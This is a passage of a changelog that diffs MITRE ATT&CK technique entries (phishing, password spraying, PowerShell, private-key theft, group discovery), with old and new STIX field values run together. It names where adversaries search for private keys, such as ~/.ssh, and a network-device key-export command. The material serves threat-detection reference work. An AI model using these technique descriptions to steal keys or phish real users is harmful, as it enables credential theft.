Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017)
external_references[3]['url']https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.htmlhttps://web.archive.org/web/20170923102302/https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Process: OS API ExecutionWindows Registry: Windows Registry Key Creation
x_mitre_data_sources[1]Command: Command ExecutionModule: Module Load
x_mitre_data_sources[2]File: File CreationScript: Script Execution
x_mitre_data_sources[3]Module: Module LoadCommand: Command Execution
x_mitre_version1.31.4
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: OS API Execution
x_mitre_data_sourcesWMI: WMI Creation
x_mitre_data_sourcesFile: File Creation
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/267.html', 'external_id': 'CAPEC-267'}

[T1110.001] Brute Force: Password Guessing

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX FieldOld valueNew Value
modified2022-07-22 18:37:22.173000+00:002023-04-14 23:04:08.394000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]User Account: User Account AuthenticationApplication Log: Application Log Content
x_mitre_data_sources[1]Application Log: Application Log ContentUser Account: User Account Authentication
x_mitre_version1.31.4
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/49.html', 'external_id': 'CAPEC-49'}

[T1110.003] Brute Force: Password Spraying

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
external_referencesMetcalf, S. (2018, May 6). Trimarc Research: Detecting Password Spraying with Security Event Auditing. Retrieved January 16, 2019.
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
external_referencesCAPEC-565
values_changed
STIX FieldOld valueNew Value
modified2021-04-06 12:32:47.678000+00:002023-04-14 23:04:38.816000+00:00
external_references[1]['source_name']capecTrimarc Detecting Password Spraying
external_references[1]['url']https://capec.mitre.org/data/definitions/565.htmlhttps://www.trimarcsecurity.com/single-post/2018/05/06/Trimarc-Research-Detecting-Password-Spraying-with-Security-Event-Auditing
x_mitre_version1.21.3
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Trimarc Detecting Password Spraying', 'description': 'Metcalf, S. (2018, May 6). Trimarc Research: Detecting Password Spraying with Security Event Auditing. Retrieved January 16, 2019.', 'url': 'https://www.trimarcsecurity.com/single-post/2018/05/06/Trimarc-Research-Detecting-Password-Spraying-with-Security-Event-Auditing'}

[T1069] Permission Groups Discovery

Current version: 2.5

Version changed from: 2.4 → 2.5


Old Description
New Description
t1Adversaries may attempt to find group and permission settingt1Adversaries may attempt to discover group and permission set
>s. This information can help adversaries determine which use>tings. This information can help adversaries determine which
>r accounts and groups are available, the membership of users> user accounts and groups are available, the membership of u
> in particular groups, and which users and groups have eleva>sers in particular groups, and which users and groups have e
>ted permissions.>levated permissions.  Adversaries may attempt to discover gr
 >oup permission settings in many different ways. This data ma
 >y provide the adversary with information about the compromis
 >ed environment that can be used in follow-on activity and ta
 >rgeting.(Citation: CrowdStrike BloodHound April 2018)

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
external_referencesKubernetes. (n.d.). Authorization Overview. Retrieved June 24, 2021.
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
external_referencesCAPEC-576
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 18:10:53.423000+00:002023-04-15 17:26:53.365000+00:00
descriptionAdversaries may attempt to find group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions. Adversaries may attempt to discover group permission settings in many different ways. This data may provide the adversary with information about the compromised environment that can be used in follow-on activity and targeting.(Citation: CrowdStrike BloodHound April 2018)
external_references[1]['source_name']capecK8s Authorization Overview
external_references[1]['url']https://capec.mitre.org/data/definitions/576.htmlhttps://kubernetes.io/docs/reference/access-authn-authz/authorization/
external_references[2]['source_name']K8s Authorization OverviewCrowdStrike BloodHound April 2018
external_references[2]['description']Kubernetes. (n.d.). Authorization Overview. Retrieved June 24, 2021.Red Team Labs. (2018, April 24). Hidden Administrative Accounts: BloodHound to the Rescue. Retrieved October 28, 2020.
external_references[2]['url']https://kubernetes.io/docs/reference/access-authn-authz/authorization/https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/
x_mitre_data_sources[0]Group: Group EnumerationCommand: Command Execution
x_mitre_data_sources[1]Application Log: Application Log ContentGroup: Group Enumeration
x_mitre_data_sources[3]Group: Group MetadataApplication Log: Application Log Content
x_mitre_data_sources[4]Command: Command ExecutionGroup: Group Metadata
x_mitre_version2.42.5

[T1566] Phishing

Current version: 2.3

Version changed from: 2.2 → 2.3


Old Description
New Description
t1Adversaries may send phishing messages to gain access to vict1Adversaries may send phishing messages to gain access to vic
>tim systems. All forms of phishing are electronically delive>tim systems. All forms of phishing are electronically delive
>red social engineering. Phishing can be targeted, known as s>red social engineering. Phishing can be targeted, known as s
>pearphishing. In spearphishing, a specific individual, compa>pearphishing. In spearphishing, a specific individual, compa
>ny, or industry will be targeted by the adversary. More gene>ny, or industry will be targeted by the adversary. More gene
>rally, adversaries can conduct non-targeted phishing, such a>rally, adversaries can conduct non-targeted phishing, such a
>s in mass malware spam campaigns.  Adversaries may send vict>s in mass malware spam campaigns.  Adversaries may send vict
>ims emails containing malicious attachments or links, typica>ims emails containing malicious attachments or links, typica
>lly to execute malicious code on victim systems. Phishing ma>lly to execute malicious code on victim systems. Phishing ma
>y also be conducted via third-party services, like social me>y also be conducted via third-party services, like social me
>dia platforms. Phishing may also involve social engineering >dia platforms. Phishing may also involve social engineering 
>techniques, such as posing as a trusted source.>techniques, such as posing as a trusted source, as well as e
 >vasive techniques such as removing or manipulating emails or
 > metadata/headers from compromised accounts being abused to 
 >send messages (e.g., [Email Hiding Rules](https://attack.mit
 >re.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spa
 >m 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) An
 >other way to accomplish this is by forging or spoofing(Citat
 >ion: Proofpoint-spoof) the identity of the sender which can 
 >be used to fool both the human recipient as well as automate
 >d security tools.(Citation: cyberproof-double-bounce)   Vict
 >ims may also receive phishing messages that instruct them to
 > call a phone number where they are directed to visit a mali
 >cious URL, download malware,(Citation: sygnia Luna Month)(Ci
 >tation: CISA Remote Monitoring and Management Software) or i
 >nstall adversary-accessible remote management tools onto the
 >ir computer (i.e., [User Execution](https://attack.mitre.org
 >/techniques/T1204)).(Citation: Unit42 Luna Moth)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
external_referencesAustralian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-98
values_changed
STIX FieldOld valueNew Value
modified2022-01-04 13:57:16.959000+00:002023-04-14 17:42:15.871000+00:00
descriptionAdversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns. Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source.Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns. Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce) Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)
external_references[1]['source_name']capecACSC Email Spoofing
external_references[1]['url']https://capec.mitre.org/data/definitions/98.htmlhttps://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
external_references[2]['source_name']Microsoft Anti SpoofingCISA Remote Monitoring and Management Software
external_references[2]['description']Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring and Management Software. Retrieved February 2, 2023.
external_references[2]['url']https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwidehttps://www.cisa.gov/uscert/ncas/alerts/aa23-025a
external_references[3]['source_name']ACSC Email Spoofingcyberproof-double-bounce
external_references[3]['description']Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.Itkin, Liora. (2022, September 1). Double-bounced attacks with email spoofing . Retrieved February 24, 2023.
external_references[3]['url']https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdfhttps://blog.cyberproof.com/blog/double-bounced-attacks-with-email-spoofing-2022-trends
x_mitre_version2.22.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Unit42 Luna Moth', 'description': 'Kristopher Russo. (n.d.). Luna Moth Callback Phishing Campaign. Retrieved February 2, 2023.', 'url': 'https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/'}
external_references{'source_name': 'Microsoft Anti Spoofing', 'description': 'Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.', 'url': 'https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide'}
external_references{'source_name': 'Microsoft OAuth Spam 2022', 'description': 'Microsoft. (2023, September 22). Malicious OAuth applications abuse cloud email services to spread spam. Retrieved March 13, 2023.', 'url': 'https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/'}
external_references{'source_name': 'sygnia Luna Month', 'description': 'Oren Biderman, Tomer Lahiyani, Noam Lifshitz, Ori Porag. (n.d.). LUNA MOTH: THE THREAT ACTORS BEHIND RECENT FALSE SUBSCRIPTION SCAMS. Retrieved February 2, 2023.', 'url': 'https://blog.sygnia.co/luna-moth-false-subscription-scams'}
external_references{'source_name': 'Proofpoint-spoof', 'description': 'Proofpoint. (n.d.). What Is Email Spoofing?. Retrieved February 24, 2023.', 'url': 'https://www.proofpoint.com/us/threat-reference/email-spoofing'}
external_references{'source_name': 'Palo Alto Unit 42 VBA Infostealer 2014', 'description': 'Vicky Ray and Rob Downs. (2014, October 29). Examining a VBA-Initiated Infostealer Campaign. Retrieved March 13, 2023.', 'url': 'https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/'}
x_mitre_contributorsOhad Zaidenberg, @ohad_mz
x_mitre_contributorsLiora Itkin
x_mitre_contributorsLiran Ravich, CardinalOps
x_mitre_contributorsScott Cook, Capital One
x_mitre_data_sourcesApplication Log: Application Log Content
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesApplication Log: Application Log Content

[T1598] Phishing for Information

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may send phishing messages to elicit sensitive it1Adversaries may send phishing messages to elicit sensitive i
>nformation that can be used during targeting. Phishing for i>nformation that can be used during targeting. Phishing for i
>nformation is an attempt to trick targets into divulging inf>nformation is an attempt to trick targets into divulging inf
>ormation, frequently credentials or other actionable informa>ormation, frequently credentials or other actionable informa
>tion. Phishing for information is different from [Phishing](>tion. Phishing for information is different from [Phishing](
>https://attack.mitre.org/techniques/T1566) in that the objec>https://attack.mitre.org/techniques/T1566) in that the objec
>tive is gathering data from the victim rather than executing>tive is gathering data from the victim rather than executing
> malicious code.  All forms of phishing are electronically d> malicious code.  All forms of phishing are electronically d
>elivered social engineering. Phishing can be targeted, known>elivered social engineering. Phishing can be targeted, known
> as spearphishing. In spearphishing, a specific individual, > as spearphishing. In spearphishing, a specific individual, 
>company, or industry will be targeted by the adversary. More>company, or industry will be targeted by the adversary. More
> generally, adversaries can conduct non-targeted phishing, s> generally, adversaries can conduct non-targeted phishing, s
>uch as in mass credential harvesting campaigns.  Adversaries>uch as in mass credential harvesting campaigns.  Adversaries
> may also try to obtain information directly through the exc> may also try to obtain information directly through the exc
>hange of emails, instant messages, or other electronic conve>hange of emails, instant messages, or other electronic conve
>rsation means.(Citation: ThreatPost Social Media Phishing)(C>rsation means.(Citation: ThreatPost Social Media Phishing)(C
>itation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Ci>itation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Ci
>tation: Sophos Attachment)(Citation: GitHub Phishery) Phishi>tation: Sophos Attachment)(Citation: GitHub Phishery) Victim
>ng for information frequently involves social engineering te>s may also receive phishing messages that direct them to cal
>chniques, such as posing as a source with a reason to collec>l a phone number where the adversary attempts to collect con
>t information (ex: [Establish Accounts](https://attack.mitre>fidential information.(Citation: Avertium callback phishing)
>.org/techniques/T1585) or [Compromise Accounts](https://atta>  Phishing for information frequently involves social engine
>ck.mitre.org/techniques/T1586)) and/or sending multiple, see>ering techniques, such as posing as a source with a reason t
>mingly urgent messages.>o collect information (ex: [Establish Accounts](https://atta
 >ck.mitre.org/techniques/T1585) or [Compromise Accounts](http
 >s://attack.mitre.org/techniques/T1586)) and/or sending multi
 >ple, seemingly urgent messages. Another way to accomplish th
 >is is by forging or spoofing(Citation: Proofpoint-spoof) the
 > identity of the sender which can be used to fool both the h
 >uman recipient as well as automated security tools.(Citation
 >: cyberproof-double-bounce)   Phishing for information may a
 >lso involve evasive techniques, such as removing or manipula
 >ting emails or metadata/headers from compromised accounts be
 >ing abused to send messages (e.g., [Email Hiding Rules](http
 >s://attack.mitre.org/techniques/T1564/008)).(Citation: Micro
 >soft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infost
 >ealer 2014)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2022-03-08 21:57:56.078000+00:002023-04-14 17:42:38.063000+00:00
descriptionAdversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns. Adversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Phishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns. Adversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Victims may also receive phishing messages that direct them to call a phone number where the adversary attempts to collect confidential information.(Citation: Avertium callback phishing) Phishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce) Phishing for information may also involve evasive techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)
external_references[1]['source_name']ThreatPost Social Media PhishingACSC Email Spoofing
external_references[1]['description']O'Donnell, L. (2020, October 20). Facebook: A Top Launching Pad For Phishing Attacks. Retrieved October 20, 2020.Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
external_references[1]['url']https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
external_references[2]['source_name']TrendMictro PhishingAvertium callback phishing
external_references[2]['description']Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved October 20, 2020.Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK PHISHING. Retrieved February 2, 2023.
external_references[2]['url']https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.htmlhttps://www.avertium.com/resources/threat-reports/everything-you-need-to-know-about-callback-phishing
external_references[3]['source_name']PCMag FakeLoginTrendMictro Phishing
external_references[3]['description']Kan, M. (2019, October 24). Hackers Try to Phish United Nations Staffers With Fake Login Pages. Retrieved October 20, 2020.Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved October 20, 2020.
external_references[3]['url']https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pageshttps://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html
external_references[5]['source_name']GitHub Phisherycyberproof-double-bounce
external_references[5]['description']Ryan Hanson. (2016, September 24). phishery. Retrieved October 23, 2020.Itkin, Liora. (2022, September 1). Double-bounced attacks with email spoofing . Retrieved February 24, 2023.
external_references[5]['url']https://github.com/ryhanson/phisheryhttps://blog.cyberproof.com/blog/double-bounced-attacks-with-email-spoofing-2022-trends
external_references[6]['source_name']Microsoft Anti SpoofingPCMag FakeLogin
external_references[6]['description']Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.Kan, M. (2019, October 24). Hackers Try to Phish United Nations Staffers With Fake Login Pages. Retrieved October 20, 2020.
external_references[6]['url']https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwidehttps://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages
external_references[7]['source_name']ACSC Email SpoofingMicrosoft Anti Spoofing
external_references[7]['description']Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.
external_references[7]['url']https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdfhttps://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Microsoft OAuth Spam 2022', 'description': 'Microsoft. (2023, September 22). Malicious OAuth applications abuse cloud email services to spread spam. Retrieved March 13, 2023.', 'url': 'https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/'}
external_references{'source_name': 'ThreatPost Social Media Phishing', 'description': "O'Donnell, L. (2020, October 20). Facebook: A Top Launching Pad For Phishing Attacks. Retrieved October 20, 2020.", 'url': 'https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/'}
external_references{'source_name': 'Proofpoint-spoof', 'description': 'Proofpoint. (n.d.). What Is Email Spoofing?. Retrieved February 24, 2023.', 'url': 'https://www.proofpoint.com/us/threat-reference/email-spoofing'}
external_references{'source_name': 'GitHub Phishery', 'description': 'Ryan Hanson. (2016, September 24). phishery. Retrieved October 23, 2020.', 'url': 'https://github.com/ryhanson/phishery'}
external_references{'source_name': 'Palo Alto Unit 42 VBA Infostealer 2014', 'description': 'Vicky Ray and Rob Downs. (2014, October 29). Examining a VBA-Initiated Infostealer Campaign. Retrieved March 13, 2023.', 'url': 'https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/'}
x_mitre_contributorsOhad Zaidenberg, @ohad_mz
x_mitre_contributorsLiora Itkin
x_mitre_contributorsLiran Ravich, CardinalOps
x_mitre_contributorsScott Cook, Capital One
x_mitre_data_sourcesNetwork Traffic: Network Traffic Flow
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Traffic: Network Traffic Flow

[T1059.001] Command and Scripting Interpreter: PowerShell

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-19 20:25:48.646000+00:002023-03-27 17:19:48.136000+00:00
external_references[2]['url']https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/https://web.archive.org/web/20190508170150/https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/
external_references[8]['url']http://www.sixdub.net/?p=367https://web.archive.org/web/20160327101330/http://www.sixdub.net/?p=367
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Script: Script ExecutionProcess: Process Creation
x_mitre_data_sources[2]Process: Process MetadataModule: Module Load
x_mitre_data_sources[3]Process: Process CreationScript: Script Execution
x_mitre_data_sources[4]Module: Module LoadProcess: Process Metadata
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsRoss Brittain

[T1552.004] Unsecured Credentials: Private Keys

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may search for private key certificate files on t1Adversaries may search for private key certificate files on 
>compromised systems for insecurely stored credentials. Priva>compromised systems for insecurely stored credentials. Priva
>te cryptographic keys and certificates are used for authenti>te cryptographic keys and certificates are used for authenti
>cation, encryption/decryption, and digital signatures.(Citat>cation, encryption/decryption, and digital signatures.(Citat
>ion: Wikipedia Public Key Crypto) Common key and certificate>ion: Wikipedia Public Key Crypto) Common key and certificate
> file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pe> file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pe
>m, .pfx, .cer, .p7b, .asc.   Adversaries may also look in co>m, .pfx, .cer, .p7b, .asc.   Adversaries may also look in co
>mmon key directories, such as <code>~/.ssh</code> for SSH ke>mmon key directories, such as <code>~/.ssh</code> for SSH ke
>ys on * nix-based systems or <code>C:&#92;Users&#92;(usernam>ys on * nix-based systems or <code>C:&#92;Users&#92;(usernam
>e)&#92;.ssh&#92;</code> on Windows. These private keys can b>e)&#92;.ssh&#92;</code> on Windows. Adversary tools may also
>e used to authenticate to [Remote Services](https://attack.m> search compromised systems for file extensions relating to 
>itre.org/techniques/T1021) like SSH or for use in decrypting>cryptographic keys and certificates.(Citation: Kaspersky Car
> other collected files such as email.  Adversary tools have >eto)(Citation: Palo Alto Prince of Persia)  When a device is
>been discovered that search compromised systems for file ext> registered to Azure AD, a device key and a transport key ar
>ensions relating to cryptographic keys and certificates.(Cit>e generated and used to verify the device’s identity.(Citati
>ation: Kaspersky Careto)(Citation: Palo Alto Prince of Persi>on: Microsoft Primary Refresh Token) An adversary with acces
>a)  Some private keys require a password or passphrase for o>s to the device may be able to export the keys in order to i
>peration, so an adversary may also use [Input Capture](https>mpersonate the device.(Citation: AADInternals Azure AD Devic
>://attack.mitre.org/techniques/T1056) for keylogging or atte>e Identities)  On network devices, private keys may be expor
>mpt to [Brute Force](https://attack.mitre.org/techniques/T11>ted via [Network Device CLI](https://attack.mitre.org/techni
>10) the passphrase off-line.>ques/T1059/008) commands such as `crypto pki export`.(Citati
 >on: cisco_deploy_rsa_keys)   Some private keys require a pas
 >sword or passphrase for operation, so an adversary may also 
 >use [Input Capture](https://attack.mitre.org/techniques/T105
 >6) for keylogging or attempt to [Brute Force](https://attack
 >.mitre.org/techniques/T1110) the passphrase off-line. These 
 >private keys can be used to authenticate to [Remote Services
 >](https://attack.mitre.org/techniques/T1021) like SSH or for
 > use in decrypting other collected files such as email.

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2020-03-29 21:36:36.613000+00:002023-04-12 23:52:08.194000+00:00
descriptionAdversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. Adversaries may also look in common key directories, such as ~/.ssh for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\ on Windows. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email. Adversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia) Some private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line.Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. Adversaries may also look in common key directories, such as ~/.ssh for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\ on Windows. Adversary tools may also search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia) When a device is registered to Azure AD, a device key and a transport key are generated and used to verify the device’s identity.(Citation: Microsoft Primary Refresh Token) An adversary with access to the device may be able to export the keys in order to impersonate the device.(Citation: AADInternals Azure AD Device Identities) On network devices, private keys may be exported via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `crypto pki export`.(Citation: cisco_deploy_rsa_keys) Some private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email.
external_references[1]['source_name']Wikipedia Public Key CryptoPalo Alto Prince of Persia
external_references[1]['description']Wikipedia. (2017, June 29). Public-key cryptography. Retrieved July 5, 2017.Bar, T., Conant, S., Efraim, L. (2016, June 28). Prince of Persia – Game Over. Retrieved July 5, 2017.
external_references[1]['url']https://en.wikipedia.org/wiki/Public-key_cryptographyhttps://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/
external_references[2]['source_name']Kaspersky Caretocisco_deploy_rsa_keys
external_references[2]['description']Kaspersky Labs. (2014, February 11). Unveiling “Careto” - The Masked APT. Retrieved July 5, 2017.Cisco. (2023, February 17). Chapter: Deploying RSA Keys Within a PKI . Retrieved March 27, 2023.
external_references[2]['url']https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdfhttps://www.cisco.com/c/en/us/td/docs/ios-xml/ios/sec_conn_pki/configuration/xe-17/sec-pki-xe-17-book/sec-deploy-rsa-pki.html#GUID-1CB802D8-9DE3-447F-BECE-CF22F5E11436
external_references[3]['source_name']Palo Alto Prince of PersiaAADInternals Azure AD Device Identities
external_references[3]['description']Bar, T., Conant, S., Efraim, L. (2016, June 28). Prince of Persia – Game Over. Retrieved July 5, 2017.Dr. Nestori Syynimaa. (2022, February 15). Stealing and faking Azure AD device identities. Retrieved February 21, 2023.
external_references[3]['url']https://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/https://aadinternals.com/post/deviceidentity/
x_mitre_data_sources[0]File: File AccessCommand: Command Execution
x_mitre_data_sources[1]Command: Command ExecutionFile: File Access
